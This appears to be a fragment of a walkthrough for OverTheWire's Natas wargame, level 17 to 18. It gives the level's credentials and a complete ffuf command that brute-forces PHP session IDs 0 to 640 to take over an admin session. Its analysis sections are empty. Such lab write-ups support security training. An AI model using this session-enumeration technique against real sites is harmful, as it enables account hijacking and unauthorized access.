Level 17 - Level 18
Username: natas18
Password: 8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq
URL: http://natas18.natas.labs.overthewire.orgOverview

Source Code Analysis



Getting the Password


Last updated
Username: natas18
Password: 8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq
URL: http://natas18.natas.labs.overthewire.org





Last updated
for i in {0..640}; do echo $i >> 640.txt; doneffuf -w 640.txt:FUZZ \
-u $'http://natas18.natas.labs.overthewire.org/index.php' \
-X $'POST' \
-H $'Host: natas18.natas.labs.overthewire.org' \
-H $'Content-Length: 31' -H $'Cache-Control: max-age=0' \
-H $'Authorization: Basic bmF0YXMxODo4TkVEVVV4ZzhrRmdQVjg0dUx3dlprR242b2tKUTZhcQ==' \
-H $'Upgrade-Insecure-Requests: 1' \
-H $'Origin: http://natas18.natas.labs.overthewire.org' \
-H $'Content-Type: application/x-www-form-urlencoded' \
-H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
-H $'Referer: http://natas18.natas.labs.overthewire.org/' \
-H $'Accept-Encoding: gzip, deflate, br' \
-H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H $'Connection: close' \
-b $'PHPSESSID=FUZZ' \
-d $'username=admin&password=somoene' \
-fr "You are logged in as a regular user."